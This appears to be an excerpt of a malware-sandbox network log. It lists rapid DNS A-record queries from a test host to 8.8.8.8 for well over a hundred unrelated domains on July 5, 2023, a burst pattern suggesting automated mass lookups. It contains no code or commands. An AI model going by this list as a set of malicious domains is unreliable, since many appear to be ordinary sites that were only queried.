                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.285274029 CEST192.168.2.68.8.8.80x12aStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.288322926 CEST192.168.2.68.8.8.80x4aa9Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.292990923 CEST192.168.2.68.8.8.80x2e3Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.310199976 CEST192.168.2.68.8.8.80x8ea5Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.316987038 CEST192.168.2.68.8.8.80x1697Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.326287985 CEST192.168.2.68.8.8.80xc786Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.336143017 CEST192.168.2.68.8.8.80xc1beStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.353990078 CEST192.168.2.68.8.8.80xc0d5Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.386836052 CEST192.168.2.68.8.8.80x49d2Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.421614885 CEST192.168.2.68.8.8.80xb2c2Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.459669113 CEST192.168.2.68.8.8.80x19bbStandard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.476998091 CEST192.168.2.68.8.8.80x1df2Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.508814096 CEST192.168.2.68.8.8.80xcf56Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.522110939 CEST192.168.2.68.8.8.80x62c6Standard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.554373980 CEST192.168.2.68.8.8.80x4edfStandard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.556391001 CEST192.168.2.68.8.8.80x8651Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.558279991 CEST192.168.2.68.8.8.80xdb3eStandard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.560384989 CEST192.168.2.68.8.8.80xef3cStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.561853886 CEST192.168.2.68.8.8.80x23d2Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.570204973 CEST192.168.2.68.8.8.80x13e8Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.574449062 CEST192.168.2.68.8.8.80x300Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.579423904 CEST192.168.2.68.8.8.80x912cStandard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.586621046 CEST192.168.2.68.8.8.80xbee5Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.587728977 CEST192.168.2.68.8.8.80xedebStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.591383934 CEST192.168.2.68.8.8.80xc7eeStandard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.593871117 CEST192.168.2.68.8.8.80x4828Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.613100052 CEST192.168.2.68.8.8.80x7177Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.628237009 CEST192.168.2.68.8.8.80xe247Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.653681040 CEST192.168.2.68.8.8.80xe500Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.668292046 CEST192.168.2.68.8.8.80x2e89Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.694434881 CEST192.168.2.68.8.8.80x79c0Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.701422930 CEST192.168.2.68.8.8.80xf8c3Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.709681034 CEST192.168.2.68.8.8.80x8d21Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.714940071 CEST192.168.2.68.8.8.80xbf26Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.724214077 CEST192.168.2.68.8.8.80xb0f3Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.753014088 CEST192.168.2.68.8.8.80x3a4aStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.757026911 CEST192.168.2.68.8.8.80x5957Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.769109964 CEST192.168.2.68.8.8.80x13ddStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.776124954 CEST192.168.2.68.8.8.80xe3bdStandard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.812870026 CEST192.168.2.68.8.8.80xf692Standard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.812870026 CEST192.168.2.68.8.8.80x9d2Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.852899075 CEST192.168.2.68.8.8.80x7435Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.870733023 CEST192.168.2.68.8.8.80xf12bStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.873893023 CEST192.168.2.68.8.8.80x1d53Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.074805975 CEST192.168.2.68.8.8.80x22cStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.085381985 CEST192.168.2.68.8.8.80x96b9Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.194675922 CEST192.168.2.68.8.8.80xa92cStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.197387934 CEST192.168.2.68.8.8.80x374dStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.209593058 CEST192.168.2.68.8.8.80x86f5Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.274837017 CEST192.168.2.68.8.8.80x6e40Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.461059093 CEST192.168.2.68.8.8.80x9a0aStandard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.531342030 CEST192.168.2.68.8.8.80xeb75Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.543468952 CEST192.168.2.68.8.8.80xa835Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.677400112 CEST192.168.2.68.8.8.80x6dd4Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.697874069 CEST192.168.2.68.8.8.80x7fe3Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.698957920 CEST192.168.2.68.8.8.80xc7c5Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.699886084 CEST192.168.2.68.8.8.80x78bdStandard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.702070951 CEST192.168.2.68.8.8.80xa00Standard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.789098024 CEST192.168.2.68.8.8.80xea30Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.797126055 CEST192.168.2.68.8.8.80xc4f8Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.808046103 CEST192.168.2.68.8.8.80xcb9dStandard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.820223093 CEST192.168.2.68.8.8.80xb7e3Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.847608089 CEST192.168.2.68.8.8.80x13e8Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.855920076 CEST192.168.2.68.8.8.80xe580Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.908721924 CEST192.168.2.68.8.8.80x73c6Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.921675920 CEST192.168.2.68.8.8.80xf54dStandard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.928628922 CEST192.168.2.68.8.8.80x7093Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.322439909 CEST192.168.2.68.8.8.80x82f4Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.437149048 CEST192.168.2.68.8.8.80x5adcStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.455909967 CEST192.168.2.68.8.8.80x6f23Standard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.460779905 CEST192.168.2.68.8.8.80x6d75Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.505474091 CEST192.168.2.68.8.8.80x79c0Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.508006096 CEST192.168.2.68.8.8.80x3b24Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.510648966 CEST192.168.2.68.8.8.80x12bStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.513380051 CEST192.168.2.68.8.8.80x4398Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.515758038 CEST192.168.2.68.8.8.80xe37fStandard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.519166946 CEST192.168.2.68.8.8.80x1940Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.519166946 CEST192.168.2.68.8.8.80x271eStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.522016048 CEST192.168.2.68.8.8.80x7d76Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.537692070 CEST192.168.2.68.8.8.80xc80bStandard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.670885086 CEST192.168.2.68.8.8.80xdb25Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.738151073 CEST192.168.2.68.8.8.80x8d6eStandard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.006372929 CEST192.168.2.68.8.8.80xcba7Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.008323908 CEST192.168.2.68.8.8.80xfaf8Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.013611078 CEST192.168.2.68.8.8.80x48e4Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.059983969 CEST192.168.2.68.8.8.80x978aStandard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.061420918 CEST192.168.2.68.8.8.80x3d05Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.073905945 CEST192.168.2.68.8.8.80xed32Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.108305931 CEST192.168.2.68.8.8.80xa68dStandard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.118907928 CEST192.168.2.68.8.8.80x5414Standard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.131249905 CEST192.168.2.68.8.8.80xad47Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.259465933 CEST192.168.2.68.8.8.80x7093Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.267283916 CEST192.168.2.68.8.8.80x710eStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.271285057 CEST192.168.2.68.8.8.80x9a15Standard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.274056911 CEST192.168.2.68.8.8.80x650dStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.278841972 CEST192.168.2.68.8.8.80x1210Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.282089949 CEST192.168.2.68.8.8.80x40baStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.335098028 CEST192.168.2.68.8.8.80x7844Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.340723038 CEST192.168.2.68.8.8.80x9af6Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.358369112 CEST192.168.2.68.8.8.80x409Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.360383034 CEST192.168.2.68.8.8.80x974Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.362003088 CEST192.168.2.68.8.8.80x6da0Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.365917921 CEST192.168.2.68.8.8.80xb4d2Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.588015079 CEST192.168.2.68.8.8.80x6a79Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.591295004 CEST192.168.2.68.8.8.80xd3f1Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.457047939 CEST192.168.2.68.8.8.80x347aStandard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.682106972 CEST192.168.2.68.8.8.80x9941Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.682950974 CEST192.168.2.68.8.8.80xe4d5Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.701046944 CEST192.168.2.68.8.8.80x5b2Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.706537962 CEST192.168.2.68.8.8.80xf4f7Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.729161978 CEST192.168.2.68.8.8.80xed32Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.739068985 CEST192.168.2.68.8.8.80xec9Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.743093967 CEST192.168.2.68.8.8.80x6102Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.744512081 CEST192.168.2.68.8.8.80xb074Standard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.746318102 CEST192.168.2.68.8.8.80x61abStandard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.747420073 CEST192.168.2.68.8.8.80x8a6aStandard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.755091906 CEST192.168.2.68.8.8.80xcc9bStandard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.807291985 CEST192.168.2.68.8.8.80xa955Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.811147928 CEST192.168.2.68.8.8.80x9c72Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.814410925 CEST192.168.2.68.8.8.80xe355Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.831944942 CEST192.168.2.68.8.8.80x7093Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.848251104 CEST192.168.2.68.8.8.80xc09Standard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.863878965 CEST192.168.2.68.8.8.80x8b2cStandard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.899230003 CEST192.168.2.68.8.8.80xe9faStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.902472973 CEST192.168.2.68.8.8.80xff69Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.922739029 CEST192.168.2.68.8.8.80x4712Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.929042101 CEST192.168.2.68.8.8.80xc1c4Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.980078936 CEST192.168.2.68.8.8.80x9a5fStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.066015959 CEST192.168.2.68.8.8.80x5d51Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.070220947 CEST192.168.2.68.8.8.80xf11fStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.076704025 CEST192.168.2.68.8.8.80x1fbcStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.080913067 CEST192.168.2.68.8.8.80x33b0Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.088289022 CEST192.168.2.68.8.8.80xc121Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.164050102 CEST192.168.2.68.8.8.80x87acStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.183500051 CEST192.168.2.68.8.8.80xb24cStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.285913944 CEST192.168.2.68.8.8.80x2ffStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.365092039 CEST192.168.2.68.8.8.80xa82fStandard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.371417046 CEST192.168.2.68.8.8.80x32c6Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.460890055 CEST192.168.2.68.8.8.80x8ac4Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.573034048 CEST192.168.2.68.8.8.80x88eaStandard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.608017921 CEST192.168.2.68.8.8.80xfc41Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.719769001 CEST192.168.2.68.8.8.80xcecStandard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.720669985 CEST192.168.2.68.8.8.80x1bbfStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.722923040 CEST192.168.2.68.8.8.80x7f7Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.740192890 CEST192.168.2.68.8.8.80x5f50Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.791059971 CEST192.168.2.68.8.8.80x5be3Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.793673992 CEST192.168.2.68.8.8.80x78c6Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.825125933 CEST192.168.2.68.8.8.80x6f81Standard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.826478004 CEST192.168.2.68.8.8.80xed32Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.900645018 CEST192.168.2.68.8.8.80xddbbStandard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.956406116 CEST192.168.2.68.8.8.80x6dfStandard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.956406116 CEST192.168.2.68.8.8.80xeddfStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.996877909 CEST192.168.2.68.8.8.80xc1c4Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.094512939 CEST192.168.2.68.8.8.80xb68cStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.094512939 CEST192.168.2.68.8.8.80x9a15Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.097637892 CEST192.168.2.68.8.8.80xbc46Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.141149044 CEST192.168.2.68.8.8.80x17d3Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.153259039 CEST192.168.2.68.8.8.80xe1a3Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.173455000 CEST192.168.2.68.8.8.80xcec5Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.176243067 CEST192.168.2.68.8.8.80x2e3fStandard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.224103928 CEST192.168.2.68.8.8.80xe9faStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.265888929 CEST192.168.2.68.8.8.80xc5b1Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.270571947 CEST192.168.2.68.8.8.80x81edStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.271883965 CEST192.168.2.68.8.8.80xff69Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.395503998 CEST192.168.2.68.8.8.80x1ab2Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.473622084 CEST192.168.2.68.8.8.80x7ad8Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.474600077 CEST192.168.2.68.8.8.80xde86Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.476949930 CEST192.168.2.68.8.8.80x1a4eStandard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.559531927 CEST192.168.2.68.8.8.80x174bStandard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.565574884 CEST192.168.2.68.8.8.80x8b8cStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.591134071 CEST192.168.2.68.8.8.80x42fbStandard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.647151947 CEST192.168.2.68.8.8.80x8761Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.651165962 CEST192.168.2.68.8.8.80x3262Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.693219900 CEST192.168.2.68.8.8.80xebc2Standard query (0)amic.atA (IP address)IN (0x0001)false
